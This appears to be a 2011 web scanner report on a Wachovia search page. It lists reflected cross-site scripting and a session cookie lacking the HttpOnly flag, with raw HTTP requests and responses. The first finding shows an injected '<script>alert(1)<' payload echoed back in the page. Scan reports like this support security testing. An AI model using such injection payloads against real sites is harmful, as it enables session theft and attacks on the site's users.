1. Cross-site scripting (reflected)
2. Cookie without HttpOnly flag set
Severity: | High |
Confidence: | Certain |
Host: | http://search.wachovia |
Path: | /selfservice/microsites |
GET /selfservice/microsites Host: search.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=0E2F343A1 Content-Type: text/html;charset=UTF-8 Date: Thu, 03 Feb 2011 13:17:41 GMT Connection: close <html> <head> <title>KNOVA Search Results </title> <meta http-equiv="content-type" content="text/html;c ...[SNIP]... <TextArea name="aaef9"><script>alert(1)< ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://search.wachovia |
Path: | /selfservice/microsites |
GET /selfservice/microsites Host: search.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=030BBA540 Content-Type: text/html;charset=UTF-8 Date: Thu, 03 Feb 2011 13:17:30 GMT Connection: close <html> <head> <title>KNOVA Search Results </title> <meta http-equiv="content-type" content="text/html;c ...[SNIP]... |